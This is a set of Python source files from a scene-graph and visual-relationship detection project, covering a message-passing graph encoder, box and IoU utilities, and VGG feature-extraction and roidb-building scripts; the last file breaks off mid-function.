    connection, and classifies each edge into `edge_types` predicates.
    forward() returns (edge logits [B, E, edge_types],
    node-class logits [B, N, node_types]).
    """
    def __init__(self, n_hid, edge_types=71, node_types=101, n_iter=2, do_prob=0., use_vis=True, use_spatial=False, use_sem=True, use_loc=False, use_cls=False):
        # BUG FIX: the original called super(MLPEncoder, self).__init__(),
        # but no MLPEncoder exists in this module, so instantiating the
        # class raised a NameError before nn.Module was initialized.
        super(NMPEncoder, self).__init__()
        self.use_vis = use_vis
        self.use_spatial = use_spatial
        self.use_sem = use_sem
        self.use_loc = use_loc
        self.use_cls = use_cls
        self.n_iter = n_iter  # NOTE(review): stored but not used in forward()
        self.vis_hid = 128
        self.sem_hid = n_hid
        self.spatial_hid = n_hid
        self.loc_hid = 64
        self.cls_hid = 64
        # Message-passing MLPs. mlp4/mlp5 backed an alternative second
        # message-passing round that is currently disabled; they are kept so
        # existing checkpoints/state_dicts continue to load.
        self.mlp1 = MLP(n_hid * 2, n_hid, n_hid, do_prob)
        self.mlp2 = MLP(n_hid, n_hid, n_hid, do_prob)
        self.mlp3 = MLP(n_hid * 3, n_hid, n_hid, do_prob)
        self.mlp4 = MLP(n_hid * 2, n_hid, n_hid, do_prob)
        self.mlp5 = MLP(n_hid * 2, n_hid, n_hid, do_prob)
        self.mlp_e2n = MLP(n_hid * 2, n_hid, n_hid, do_prob)
        # ------- visual feature ---------#
        self.fc_vis = MLP(4096, self.vis_hid, self.vis_hid, do_prob)
        # ------ spatial feature ---------#
        self.fc_spatial = MLP(512, self.spatial_hid, self.spatial_hid, do_prob)
        # ------- semantic feature -------#
        self.fc_sem = MLP(300, self.sem_hid, self.sem_hid, do_prob)
        # ------- location feature -------#
        self.fc_loc = MLP(20, self.loc_hid, self.loc_hid, do_prob)
        # Width of the concatenated per-node feature fed to fc_fusion.
        n_fusion = 0
        if self.use_vis:
            n_fusion += self.vis_hid
        if self.use_cls:
            n_fusion += self.cls_hid
        if self.use_sem:
            n_fusion += self.sem_hid
        # Width of the final edge feature fed to fc_rel.
        final_fusion = n_hid
        if self.use_loc:
            final_fusion += self.loc_hid
        # ---- fuse all node features into the hidden space -------#
        self.fc_fusion = FC(n_fusion, n_hid)
        self.fc_rel = FC(final_fusion, edge_types, relu=False)
        if self.use_vis:
            self.fc_cls = FC(4096, node_types, relu=False)
        else:
            self.fc_cls = FC(300, node_types, relu=False)
        self.fc_cls_feat = FC(node_types, self.cls_hid)
        self.dropout_prob = do_prob
        self.init_weights()

    def init_weights(self):
        """Xavier-init every Linear weight; biases to 0.1."""
        for m in self.modules():
            if isinstance(m, nn.Linear):
                nn.init.xavier_normal_(m.weight.data)
                m.bias.data.fill_(0.1)

    def node2edge(self, x, rel_rec, rel_send):
        """Concatenate receiver and sender node features for each edge."""
        receivers = torch.matmul(rel_rec, x)
        senders = torch.matmul(rel_send, x)
        edges = torch.cat([receivers, senders], dim=2)
        return edges

    def edge2node(self, x, rel_rec, rel_send):
        """Aggregate edge features back onto nodes.

        For each node, the mean of its incoming edges is concatenated with
        the mean of its outgoing edges; nodes with no edges use a divisor of
        1 to avoid division by zero.
        """
        new_rec_rec = rel_rec.permute(0,2,1)
        weight_rec = torch.sum(new_rec_rec, -1).float()
        weight_rec = weight_rec + (weight_rec==0).float()
        weight_rec = torch.unsqueeze(weight_rec, -1).expand(weight_rec.size(0), weight_rec.size(1), x.size(-1))
        incoming = torch.matmul(new_rec_rec, x)
        incoming = incoming / weight_rec
        new_rec_send = rel_send.permute(0,2,1)
        weight_send = torch.sum(new_rec_send, -1).float()
        weight_send = weight_send + (weight_send==0).float()
        weight_send = torch.unsqueeze(weight_send, -1).expand(weight_send.size(0), weight_send.size(1), x.size(-1))
        outgoing = torch.matmul(new_rec_send, x)
        outgoing = outgoing / weight_send
        nodes = torch.cat([incoming, outgoing], -1)
        return nodes

    def forward(self, inputs, spatial_feats, rel_rec, rel_send, bbox_loc):
        # inputs: presumably [B, N, 4096+300] when use_vis (fc7 ++ word2vec)
        #   else [B, N, 300] — inferred from the slicing below; confirm.
        # spatial_feats: [B, E, 512] (only read when use_spatial).
        # bbox_loc: [B, E, 20] (only read when use_loc).
        x = inputs.view(inputs.size(0), inputs.size(1), -1)
        # ---- per-node feature projection ----
        if self.use_vis:
            x_v = self.fc_vis(x[:, :, :4096]) #[batch_size, num_nodes, vis_hid]
            node_feats = x_v
            if self.use_sem:
                x_s = self.fc_sem(x[:, :, 4096:]) #[batch_size, num_nodes, sem_hid]
                node_feats = torch.cat([node_feats, x_s], -1)
            x_cls = self.fc_cls(x[:, :, :4096])
            if self.use_cls:
                e_cls = self.fc_cls_feat(x_cls)
                node_feats = torch.cat([node_feats, e_cls], -1)
        else:
            # NOTE(review): this branch assumes use_sem; with both use_vis
            # and use_sem False, node_feats/x_cls would be undefined.
            x_s = self.fc_sem(x)
            node_feats = x_s
            x_cls = self.fc_cls(x)
        node_feats = self.fc_fusion(node_feats)
        # ---- initial edge features e_ij^1 ----
        if self.use_spatial:
            edge_feats = self.fc_spatial(spatial_feats)
        else:
            edge_feats = self.mlp1(self.node2edge(node_feats, rel_rec, rel_send))
        # ---- one message-passing round: edge -> node -> edge ----
        x = edge_feats
        x = self.mlp_e2n(self.edge2node(x, rel_rec, rel_send))
        x = self.mlp2(x)
        self.node_feats = x
        x = self.node2edge(x, rel_rec, rel_send)
        # Skip connection: concatenate [e_ij^1 ; e_ij^2].
        x = torch.cat((x, edge_feats), dim=2)
        self.edge_feats = self.mlp3(x)
        if self.use_loc:
            e_loc = self.fc_loc(bbox_loc)
            self.edge_feats = torch.cat([self.edge_feats, e_loc], -1)
        output = self.fc_rel(self.edge_feats)
        return output, x_cls
--- FILE SEPARATOR ---
import copy
import json
import os

import cv2
import ipdb
import numpy as np
def restore_from_npy(sess, restore_var):
    """Assign pretrained VGG-16 ImageNet weights from a legacy .npy dump to
    the given TensorFlow variables, in order.

    Args:
        sess: TF session used to run the assign ops.
        restore_var: list of variables ordered conv1_1 w,b ... fc7 w,b,
            matching keys_1/keys_2 below.

    NOTE(review): on NumPy >= 1.16.3 this np.load of a pickled object file
    requires allow_pickle=True — confirm the deployed NumPy version.
    """
    vgg_npy = np.load('../data/pretrained/VGG_imagenet.npy')
    vgg_npy = vgg_npy[()]  # unwrap the 0-d object array into a dict
    keys_1 = ['conv1_1', 'conv1_1', 'conv1_2', 'conv1_2', \
        'conv2_1', 'conv2_1', 'conv2_2', 'conv2_2', \
        'conv3_1', 'conv3_1', 'conv3_2', 'conv3_2', 'conv3_3', 'conv3_3', \
        'conv4_1', 'conv4_1', 'conv4_2', 'conv4_2', 'conv4_3', 'conv4_3', \
        'conv5_1', 'conv5_1', 'conv5_2', 'conv5_2', 'conv5_3', 'conv5_3', \
        'fc6', 'fc6', 'fc7', 'fc7']
    keys_2 = ['weights', 'biases', 'weights', 'biases', \
        'weights', 'biases', 'weights', 'biases', \
        'weights', 'biases', 'weights', 'biases', 'weights', 'biases', \
        'weights', 'biases', 'weights', 'biases', 'weights', 'biases', \
        'weights', 'biases', 'weights', 'biases', 'weights', 'biases', \
        'weights', 'biases', 'weights', 'biases']
    for ind, var in enumerate(restore_var):
        sess.run(var.assign(vgg_npy[keys_1[ind]][keys_2[ind]]))
    return
def read_roidb(roidb_path):
    """Load a roidb object stored as the single entry of an .npz archive.

    Args:
        roidb_path: path to an .npz file whose only entry is a 0-d object
            array wrapping the roidb (typically a dict of splits).

    Returns:
        The unwrapped Python object.

    BUG FIX: the original did `roidb_file.keys()[0]`, which worked on
    Python 2 but fails on Python 3 (KeysView is not subscriptable); use the
    NpzFile.files list instead. allow_pickle=True is required on
    NumPy >= 1.16.3 to load object arrays.
    """
    roidb_file = np.load(roidb_path, allow_pickle=True)
    key = roidb_file.files[0]
    roidb_temp = roidb_file[key]
    roidb = roidb_temp[()]  # unwrap the 0-d object array
    return roidb
def generate_batch(N_total, N_each):
    """
    This file is used to generate index of the training batch.
    Arg:
        N_total: total number of samples
        N_each: samples per batch
    out_put:
        index_box: the corresponding index
    If N_total divides evenly into batches, just return range(N_total);
    otherwise enlarge the index set to the next multiple of N_each and fill
    the padding slots with indices drawn uniformly at random.
    """
    if N_total % N_each == 0:
        return range(N_total)
    num_batch = np.int32(N_total / N_each)
    padded_len = N_each * (num_batch + 1)
    index_box = np.empty(shape=[padded_len], dtype=np.int32)
    index_box[:N_total] = range(N_total)
    index_box[N_total:] = np.random.randint(0, N_total, padded_len - N_total)
    return index_box
def check_path_exists(full_log_dir):
    """Ensure the given directory exists, creating it (and any missing
    parents) if necessary; a no-op when it already exists.

    BUG FIX: the original exists-then-mkdir pattern raced with concurrent
    creators and failed when a parent directory was missing;
    os.makedirs(..., exist_ok=True) handles both cases atomically.
    """
    os.makedirs(full_log_dir, exist_ok=True)
def generate_rela_info(au_box, index, N_each_pair):
    """Randomly sample N_each_pair augmented subject and object boxes for
    one relation pair.

    Args:
        au_box: per-object lists of augmented boxes (detections with IoU
            above the threshold, plus the GT box).
        index: (subject_id, object_id) into au_box.
        N_each_pair: number of boxes to draw (with replacement) per side.

    Returns:
        (sbox_use, obox_use): two [N_each_pair, 4] arrays.
    """
    sub_boxes = au_box[np.int32(index[0])]
    obj_boxes = au_box[np.int32(index[1])]
    # Draw subject picks first, then object picks (same RNG order as before).
    sub_pick = np.random.randint(0, len(sub_boxes), [N_each_pair, ])
    obj_pick = np.random.randint(0, len(obj_boxes), [N_each_pair, ])
    return sub_boxes[sub_pick], obj_boxes[obj_pick]
def box_id(ori_box, uni_box):
    """Map each box in ori_box to the index of an identical box in uni_box.

    Appends one index per exact (element-wise) match, preserving the order
    of ori_box; boxes with no match contribute nothing, and duplicated
    entries in uni_box contribute one index each.
    """
    return [
        j
        for box in ori_box
        for j, candidate in enumerate(uni_box)
        if np.array_equal(box, candidate)
    ]
def compute_iou_each(box1, box2):
    '''
    function: calculate the iou based on the box ordinates
    box1, box2: [x_min, y_min, x_max, y_max]
    Uses the inclusive-pixel convention (+1 on each side length);
    returns 0 for non-overlapping boxes.
    '''
    ix_min = max(box1[0], box2[0])
    iy_min = max(box1[1], box2[1])
    ix_max = min(box1[2], box2[2])
    iy_max = min(box1[3], box2[3])
    if ix_max < ix_min or iy_max < iy_min:
        return 0
    inter = (ix_max - ix_min + 1) * (iy_max - iy_min + 1)
    area1 = (box1[2] - box1[0] + 1) * (box1[3] - box1[1] + 1)
    area2 = (box2[2] - box2[0] + 1) * (box2[3] - box2[1] + 1)
    return inter / float(area1 + area2 - inter)
def compute_distance(box1, box2):
    """Normalized center distance between two boxes.

    Distance between the two box centers divided by the diagonal of the
    smallest rectangle enclosing both boxes; 0 for concentric boxes.
    """
    cx_a = (box1[0] + box1[2]) / 2.0
    cy_a = (box1[1] + box1[3]) / 2.0
    cx_b = (box2[0] + box2[2]) / 2.0
    cy_b = (box2[1] + box2[3]) / 2.0
    enc_x_min = min(box1[0], box2[0])
    enc_y_min = min(box1[1], box2[1])
    enc_x_max = max(box1[2], box2[2])
    enc_y_max = max(box1[3], box2[3])
    center_sq = (cx_a - cx_b) ** 2 + (cy_a - cy_b) ** 2
    diag_sq = (enc_x_min - enc_x_max) ** 2 + (enc_y_min - enc_y_max) ** 2
    return np.sqrt(center_sq / float(diag_sq))
def iou_dis(iou_thre=0.5, dis_thre=0.45):
    """Filter detected VRD relation pairs by spatial plausibility and save a
    new roidb.

    A detected (subject, object) pair in the test split is kept when the two
    boxes either overlap (IoU > iou_thre) or have a small normalized center
    distance (< dis_thre); the train split is passed through unchanged.
    Writes ./data/graph_roidb_iou_dis_{iou*10}_{dis*10}.npz.

    NOTE(review): requires `copy` to be imported at module level.
    """
    roidb = read_roidb('./data/vrd_rela_graph_roidb.npz')
    train = roidb['train']  # unused; the train split is re-read below
    test = roidb['test']
    new_roidb_test = []
    for i in range(len(test)):
        new_roidb_use = copy.deepcopy(test[i])
        roidb_use = test[i]
        keep_index = []
        for j in range(len(roidb_use['sub_box_dete'])):
            sub_box = roidb_use['sub_box_dete'][j]
            obj_box = roidb_use['obj_box_dete'][j]
            iou = compute_iou_each(sub_box, obj_box)
            dis = compute_distance(sub_box, obj_box)
            if (iou>iou_thre) or (dis<dis_thre):
                keep_index.append(j)
        # Keep only the surviving pairs in every per-pair field.
        new_roidb_use['sub_box_dete'] = roidb_use['sub_box_dete'][keep_index]
        new_roidb_use['obj_box_dete'] = roidb_use['obj_box_dete'][keep_index]
        new_roidb_use['sub_dete'] = roidb_use['sub_dete'][keep_index]
        new_roidb_use['obj_dete'] = roidb_use['obj_dete'][keep_index]
        new_roidb_use['rela_dete'] = roidb_use['rela_dete'][keep_index]
        new_roidb_use['sub_score'] = roidb_use['sub_score'][keep_index]
        new_roidb_use['obj_score'] = roidb_use['obj_score'][keep_index]
        # print(j, len(keep_index), len(roidb_use['sub_box_dete']))
        new_roidb_test.append(new_roidb_use)
    # save the object pairs which meet the <iou-dis> constrain
    new_roidb = {}
    new_roidb['train'] = roidb['train']
    new_roidb['test'] = new_roidb_test
    np.savez('./data/graph_roidb_iou_dis_{}_{}.npz'.format(iou_thre*10, dis_thre*10), new_roidb)
def compute_iou(box, proposal):
    """
    compute the IoU between box with proposal
    Arg:
        box: [x1,y1,x2,y2]
        proposal: N*4 matrix, each line is [p_x1,p_y1,p_x2,p_y2]
    output:
        IoU: N*1 matrix, every IoU[i] means the IoU between
             box with proposal[i,:]
    """
    proposal = np.asarray(proposal)
    # Intersection rectangle of the box with every proposal at once.
    xA = np.maximum(box[0], proposal[:, 0])
    yA = np.maximum(box[1], proposal[:, 1])
    xB = np.minimum(box[2], proposal[:, 2])
    yB = np.minimum(box[3], proposal[:, 3])
    # +1 because coordinates are treated as inclusive pixel indices.
    area_I = (xB - xA + 1) * (yB - yA + 1)
    area_box = (box[2] - box[0] + 1) * (box[3] - box[1] + 1)
    area_prop = (proposal[:, 2] - proposal[:, 0] + 1) * (proposal[:, 3] - proposal[:, 1] + 1)
    IoU = area_I / (area_box + area_prop - area_I).astype(np.float64)
    # Disjoint boxes (empty intersection) get exactly zero.
    IoU[(xB < xA) | (yB < yA)] = 0
    return IoU.reshape(-1, 1)
def generate_au_box(unique_boxes, detected_box, iou_l):
    """For every ground-truth box, gather the detections that overlap it.

    Returns a list with one entry per unique ground-truth box: the rows
    of ``detected_box`` whose IoU with that ground truth exceeds
    ``iou_l``, vertically stacked with the ground-truth box itself as
    the final row.
    """
    au_box = []
    for gt_box in unique_boxes:
        overlaps = compute_iou(gt_box, detected_box)
        matched = detected_box[np.where(overlaps > iou_l)[0]]
        au_box.append(np.vstack((matched, gt_box)))
    return au_box
def im_preprocess(image_path):
    """Load an image and prepare it for the VGG network.

    The BGR image is mean-subtracted (ImageNet channel means) and
    rescaled so the shorter side becomes 600 px, capped so the longer
    side never exceeds 1000 px.  Returns a [1, H, W, 3] batch plus the
    scale factor applied to the original image.
    """
    raw = cv2.imread(image_path).astype(np.float32, copy=True)
    raw -= np.array([[[102.9801, 115.9465, 122.7717]]])
    short_side = np.min(raw.shape[0:2])
    long_side = np.max(raw.shape[0:2])
    target_size = 600
    max_size = 1000
    scale = float(target_size) / float(short_side)
    # Shrink further if the scaled longer side would exceed max_size.
    if np.round(scale * long_side) > max_size:
        scale = float(max_size) / float(long_side)
    # ipdb.set_trace()
    resized = cv2.resize(raw, None, None, fx=scale, fy=scale,
                         interpolation=cv2.INTER_LINEAR)
    batch = np.zeros([1] + list(np.shape(resized)))
    batch[0, :, :, :] = resized
    return batch, scale
def get_blob_pred(roidb_use, im_scale, N_each_batch, batch_id):
    """Assemble one mini-batch of ground-truth pairs for feature extraction.

    Boxes are rescaled into the resized-image coordinate frame, then
    the rows selected by ``index_pred`` for mini-batch ``batch_id``
    are sliced out.
    """
    start = batch_id * N_each_batch
    picked = roidb_use['index_pred'][start: start + N_each_batch]
    blob = {
        'sub_box': (roidb_use['sub_box_gt'] * im_scale)[picked, :],
        'obj_box': (roidb_use['obj_box_gt'] * im_scale)[picked, :],
        'rela': np.int32(roidb_use['rela_gt'])[picked],
        'image': roidb_use['image'],
    }
    return blob
def get_blob_rela(roidb_use, im_scale, N_each_batch, batch_id):
    """Assemble one mini-batch of detected pairs (rela evaluation mode).

    Same slicing as ``get_blob_pred`` but driven by the detected boxes
    and ``index_rela``; no image path is attached to the blob.
    """
    start = batch_id * N_each_batch
    picked = roidb_use['index_rela'][start: start + N_each_batch]
    return {
        'sub_box': (roidb_use['sub_box_dete'] * im_scale)[picked, :],
        'obj_box': (roidb_use['obj_box_dete'] * im_scale)[picked, :],
        'rela': np.int32(roidb_use['rela_dete'])[picked],
    }
def count_prior():
    """Count (subject, object, predicate) triplets on the DSR train split.

    Writes two files: the raw 100x100x70 count tensor, and the
    (subject, object) pair probability matrix obtained by summing out
    the predicate axis and normalizing.
    """
    roidb = read_roidb('/DATA5_DB8/data/yhu/NRI/dsr_data/dsr_roidb.npz')
    prior = np.zeros([100, 100, 70])
    for entry in roidb['train_roidb']:
        for j in range(len(entry['rela_gt'])):
            s = int(entry['sub_gt'][j])
            o = int(entry['obj_gt'][j])
            r = int(entry['rela_gt'][j])
            prior[s, o, r] += 1
    np.save('/DATA5_DB8/data/yhu/NRI/dsr_data/dsr_prior_count.npy', prior)
    # Marginalize over predicates, then normalize to a probability map.
    pair_count = np.sum(prior, -1)
    np.save('/DATA5_DB8/data/yhu/NRI/dsr_data/dsr_prior_prob.npy',
            pair_count / np.sum(pair_count))
    return
--- FILE SEPARATOR ---
'''
Extract features by pretrained VGG checkpoints
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import numpy as np
from ass_fun import *
from vgg import VTranse_Vgg
import ipdb
from tqdm import tqdm
import argparse
import os
# ---- command-line configuration for the VGG feature-extraction run ----
parser = argparse.ArgumentParser()
parser.add_argument('--dataset', type=str, default='vrd',
                    help='dataset: vrd or vg')
parser.add_argument('--data_type', type=str, default='pred',
                    help='data_type: pred or rela')
parser.add_argument('--ori_vgg', action='store_true', default=False,
                    help='original vgg')
parser.add_argument('--random_vgg', action='store_true', default=False,
                    help='random initialize vgg')
args = parser.parse_args()
data_type = args.data_type
dataset = args.dataset
use_ori_vgg = args.ori_vgg
use_random_vgg = args.random_vgg
# Root directory under which all extracted feature files are written.
feat_save_path = '/DATA5_DB8/data/yhu/VTransE'
print(args)
# Pick the output directory, roidb file, fine-tuned checkpoint and batch
# size for the requested dataset/task combination.
# NOTE(review): an unrecognized combination leaves save_path undefined and
# the script dies with a NameError at check_path_exists below — confirm
# only these four combinations are ever used.
if dataset == 'vrd' and data_type == 'pred':
    # ---------- vrd pred dataset ---------------#
    if use_ori_vgg:
        save_path = os.path.join(feat_save_path, 'ori_vrd_vgg_feats')
    elif use_random_vgg:
        save_path = os.path.join(feat_save_path, 'random_vrd_vgg_feats')
    else:
        save_path = os.path.join(feat_save_path, 'vrd_vgg_feats')
    roidb_path = '../data/vrd_roidb.npz'
    res_path = '../data/pretrained/vrd_vgg_pretrained.ckpt'
    N_each_batch = 30
    is_rela = False
elif dataset == 'vrd' and data_type == 'rela':
    # ---------- vrd rela dataset ----------#
    if use_ori_vgg:
        save_path = os.path.join(feat_save_path, 'ori_vrd_rela_vgg_feats')
    elif use_random_vgg:
        save_path = os.path.join(feat_save_path, 'random_vrd_rela_vgg_feats')
    else:
        save_path = os.path.join(feat_save_path, 'vrd_rela_vgg_feats')
    roidb_path = '../data/vrd_rela_roidb.npz'
    res_path = '../data/pretrained/vrd_vgg_pretrained.ckpt'
    N_each_batch = 50
    is_rela = True
elif dataset == 'vg' and data_type == 'pred':
    # ----------- vg dataset ---------------#
    if use_ori_vgg:
        save_path = os.path.join(feat_save_path, 'ori_vg_vgg_feats')
    else:
        save_path = os.path.join(feat_save_path, 'vg_vgg_feats')
    roidb_path = '../data/vg_roidb.npz'
    res_path = '../data/pretrained/vg_vgg_pretrained.ckpt'
    N_each_batch = 30
    is_rela = False
elif dataset == 'vg' and data_type == 'rela':
    # ----------- vg rela dataset ---------------#
    save_path = os.path.join(feat_save_path, 'vg_rela_vgg_feats')
    roidb_path = '../data/vg_rela_roidb.npz'
    res_path = '../data/pretrained/vg_vgg_pretrained.ckpt'
    N_each_batch = 128
    is_rela = True
check_path_exists(save_path)
# ------ read roidb file ---------#
roidb_read = read_roidb(roidb_path)
train_roidb = roidb_read['train_roidb']
test_roidb = roidb_read['test_roidb']
N_train = len(train_roidb)
N_test = len(test_roidb)
pbar = tqdm(total=N_train+N_test)
# Progress is also printed every N_show processed images.
N_show = 100
# ------ Create Graph ------------#
vnet = VTranse_Vgg()
# Bound methods: the same extractor routine serves both splits.
graph_name = vnet.create_graph
train_func = vnet.extract_pred_fc
test_func = vnet.extract_pred_fc
graph_name(N_each_batch, save_path)
total_var = tf.trainable_variables()
# Only the VGG-16 backbone variables are restored from the checkpoint.
restore_var = [var for var in total_var if 'vgg_16' in var.name]
for var in restore_var:
    print(var)
saver_res = tf.train.Saver(var_list = restore_var)
with tf.Session() as sess:
    init = tf.global_variables_initializer()
    sess.run(init)
    if use_ori_vgg:
        # ------ restore from original vgg ---------#
        restore_from_npy(sess, restore_var)
    elif use_random_vgg:
        # Keep the random initialization: nothing to restore.
        pass
    else:
        # ------ restore from fine-tuned vgg -------#
        saver_res.restore(sess, res_path)
    # ipdb.set_trace()
    t = 0.0
    # ---- train split ----
    vnet.save_path = save_path + '/train'
    check_path_exists(vnet.save_path)
    for roidb_id in range(N_train):
        roidb_use = train_roidb[roidb_id]
        # Images without annotated relations contribute no features.
        if len(roidb_use['rela_gt']) == 0:
            continue
        # Skip images whose features already exist on disk (resume support).
        if os.path.exists(os.path.join(vnet.save_path, 'ob_fc7', os.path.basename(roidb_use['image'])+'.npy')):
            pass
        else:
            train_func(sess, roidb_use, is_rela)
        t = t + 1.0
        if t % N_show == 0:
            print("t: {0}".format(t))
        pbar.update(1)
    # ---- test split ----
    vnet.save_path = save_path + '/test'
    check_path_exists(vnet.save_path)
    for roidb_id in range(N_test):
        roidb_use = test_roidb[roidb_id]
        if len(roidb_use['rela_gt']) == 0:
            continue
        if os.path.exists(os.path.join(vnet.save_path, 'ob_fc7', os.path.basename(roidb_use['image'])+'.npy')):
            pass
        else:
            test_func(sess, roidb_use, is_rela)
        t = t + 1.0
        if t % N_show == 0:
            print("t: {0}".format(t))
        pbar.update(1)
pbar.close()
--- FILE SEPARATOR ---
'''
Feed the path of vgg features into roidb file
'''
import numpy as np
import os
import ipdb
from ass_fun import *
from tqdm import tqdm
import gensim
import h5py
import json
from sklearn.decomposition import PCA
import argparse
# ---- command-line configuration: which dataset/task to feed paths for ----
parser = argparse.ArgumentParser()
parser.add_argument('--dataset', type=str, default='vrd',
                    help='dataset: vrd or vg')
parser.add_argument('--data_type', type=str, default='pred',
                    help='data_type: pred or rela')
parser.add_argument('--ori_vgg', action='store_true', default=False,
                    help='original vgg')
parser.add_argument('--random_vgg', action='store_true', default=False,
                    help='random initialize vgg')
args = parser.parse_args()
data_type = args.data_type
dataset = args.dataset
use_ori_vgg = args.ori_vgg
use_random_vgg = args.random_vgg
print(args)
#============= the max rela of one image ========================#
def count_max_rela(train_roidb, test_roidb):
    """Print max/mean/min number of annotated relations per image.

    Statistics are reported separately for the train and test splits.
    """
    for split_name, split in (('train', train_roidb), ('test', test_roidb)):
        counts = np.array([int(len(entry['rela_gt'])) for entry in split],
                          dtype=np.int64)
        print("{0} | max: {1} | mean: {2} | min: {3}".format(
            split_name, np.max(counts), np.mean(counts), np.min(counts)))
    # Reference numbers from earlier runs:
    # VRD  train | max: 34  | mean: 8.03  | min: 1
    #      test  | max: 41  | mean: 8.0   | min: 1
    # VG   train | max: 490 | mean: 10.89 | min: 1
    #      test  | max: 352 | mean: 11.09 | min: 1
    return
#============== pred the max objects in one image ======================#
def unique_gt(box_gt, cls_gt, fc7):
    """Deduplicate boxes, keeping first occurrences in original order.

    Returns the unique boxes along with the class labels and fc7
    features aligned row-for-row with them.
    """
    # return_index yields the first occurrence of each distinct row;
    # sorting restores the original ordering of those rows.
    _, first_idx = np.unique(box_gt, axis=0, return_index=True)
    order = np.sort(first_idx)
    return box_gt[order], cls_gt[order], fc7[order]
def new_id(uni_box_gt, ori_box_gt, ori_cls_gt):
    """Map every original box to its row index in the unique-box list.

    The result has the shape/dtype of ``ori_cls_gt``; a box matching no
    unique row keeps index 0.
    """
    mapped = np.zeros_like(ori_cls_gt)
    for ori_pos, ori_box in enumerate(ori_box_gt):
        for uni_pos, uni_box in enumerate(uni_box_gt):
            if np.array_equal(ori_box, uni_box):
                mapped[ori_pos] = uni_pos
    return mapped
def pred_write_feat_into_roidb(save_path, train_roidb, test_roidb, dataset='vrd', edges_types = 70):
    """Attach cached VGG features and graph structure to every roidb entry.

    For each image the cached subject/object fc7 features are loaded,
    ground-truth boxes are deduplicated into graph nodes, an edge-label
    matrix is built (cells default to ``edges_types``, used as the
    "no relation" id), and the per-image feature file paths are stored
    into the entry (entries are mutated in place).  The augmented roidb
    is written to ``../data/<dataset>_pred_graph_roidb.npz``.

    Args:
        save_path: root directory of the extracted feature files.
        train_roidb, test_roidb: lists of per-image roidb dicts.
        dataset: tag used in the output file name.
        edges_types: number of predicate classes; doubles as the value
            marking "no edge" in the edge matrix.
    """
    edge_total = []
    node_total = []
    new_roidb = {}
    pbar = tqdm(total=len(train_roidb)+len(test_roidb))
    for name, roidb in zip(['train', 'test'], [train_roidb, test_roidb]):
        full_path = save_path + '/' + name
        feat_name = ['pred_pool5', 'pred_fc7', 'pool5', 'fc7', 'sub_fc7', 'ob_fc7']
        check_path_exists(full_path+'/uni_fc7')
        rela = np.zeros(len(roidb), dtype=np.int64)
        edges = []
        nodes = []
        for i in range(len(roidb)):
            #====== feats ============#
            # Cached features are keyed by the image file's basename.
            sub_fc7 = np.load(os.path.join(full_path, 'sub_fc7', os.path.basename(roidb[i]['image'])+'.npy'))
            ob_fc7 = np.load(os.path.join(full_path, 'ob_fc7', os.path.basename(roidb[i]['image'])+'.npy'))
            fc7 = np.concatenate([sub_fc7, ob_fc7], 0)
            # sub_pool5 = np.load(os.path.join(full_path, 'sub_pool5', os.path.basename(roidb[i]['image'])+'.npy'))
            # ob_pool5 = np.load(os.path.join(full_path, 'ob_pool5', os.path.basename(roidb[i]['image'])+'.npy'))
            # pool5 = np.concatenate([sub_pool5, ob_pool5], 0)
            # Stack subject+object annotations, then deduplicate boxes so
            # every distinct box becomes one graph node.
            box_gt = np.concatenate([roidb[i]['sub_box_gt'], roidb[i]['obj_box_gt']], 0)
            cls_gt = np.concatenate([roidb[i]['sub_gt'], roidb[i]['obj_gt']], 0)
            uni_box_gt, uni_cls_gt, uni_fc7 = unique_gt(box_gt, cls_gt, fc7)
            sub_idx = new_id(uni_box_gt, roidb[i]['sub_box_gt'], roidb[i]['sub_gt'])
            obj_idx = new_id(uni_box_gt, roidb[i]['obj_box_gt'], roidb[i]['obj_gt'])
            # ipdb.set_trace()
            # Dense edge-label matrix, initialized to the "no relation" id.
            edge_matrix = np.zeros([len(uni_cls_gt), len(uni_cls_gt)]) + edges_types
            for j, x, y in zip(np.array(range(len(sub_idx))), sub_idx, obj_idx):
                edge_matrix[int(x)][int(y)] = roidb[i]['rela_gt'][j]
            nodes.append(len(uni_cls_gt))
            edges.append(len(roidb[i]['rela_gt']))
            roidb[i]['uni_box_gt'] = uni_box_gt
            roidb[i]['uni_gt'] = uni_cls_gt
            roidb[i]['edge_matrix'] = edge_matrix
            roidb[i]['sub_idx'] = sub_idx
            roidb[i]['obj_idx'] = obj_idx
            pred_pool5_path = os.path.join(full_path, 'pred_pool5', os.path.basename(roidb[i]['image'])+'.npy')
            pred_fc7_path = os.path.join(full_path, 'pred_fc7', os.path.basename(roidb[i]['image'])+'.npy')
            uni_fc7_path = os.path.join(full_path, 'uni_fc7', os.path.basename(roidb[i]['image'])+'.npy')
            img_fc7_path = os.path.join(full_path, 'fc7', os.path.basename(roidb[i]['image'])+'.npy')
            img_pool5_path = os.path.join(full_path, 'pool5', os.path.basename(roidb[i]['image'])+'.npy')
            # Only write the deduplicated features once (resume support).
            if os.path.exists(uni_fc7_path):
                pass
            else:
                np.save(uni_fc7_path, uni_fc7)
            roidb[i]['pred_pool5'] = pred_pool5_path
            roidb[i]['pred_fc7'] = pred_fc7_path
            roidb[i]['uni_fc7'] = uni_fc7_path
            roidb[i]['img_fc7'] = img_fc7_path
            roidb[i]['img_pool5'] = img_pool5_path
            pbar.update(1)
        new_roidb[name] = roidb
        print("nodes: {0} | max: {1} | mean: {2} | min: {3}".format(name, np.max(nodes), np.mean(nodes), np.min(nodes)))
        print("edges: {0} | max: {1} | mean: {2} | min: {3}".format(name, np.max(edges), np.mean(edges), np.min(edges)))
        edge_total.append(edges)
        node_total.append(nodes)
    pbar.close()
    np.savez('../data/{}_pred_graph_roidb.npz'.format(dataset), new_roidb)
    return
def rela_write_feat_into_roidb(save_path, train_roidb, test_roidb, dataset='vrd', edges_types = 70):
    """Same as ``pred_write_feat_into_roidb`` but built on detected boxes.

    Uses the ``*_dete`` keys (detector output) instead of ground truth
    when deduplicating nodes and filling the edge matrix, and writes the
    augmented roidb to ``../data/<dataset>_rela_graph_roidb.npz``.
    Entries are mutated in place.
    """
    edge_total = []
    node_total = []
    new_roidb = {}
    pbar = tqdm(total=len(test_roidb)+len(train_roidb))
    # ------- test rela -------------#
    for name, roidb in zip(['train', 'test'], [train_roidb, test_roidb]):
        full_path = save_path + '/' + name
        # feat_name = ['pool5', 'fc7', 'sub_fc7', 'ob_fc7']
        feat_name = ['pred_pool5', 'pred_fc7', 'pool5', 'fc7', 'sub_fc7', 'ob_fc7']
        check_path_exists(full_path+'/uni_fc7')
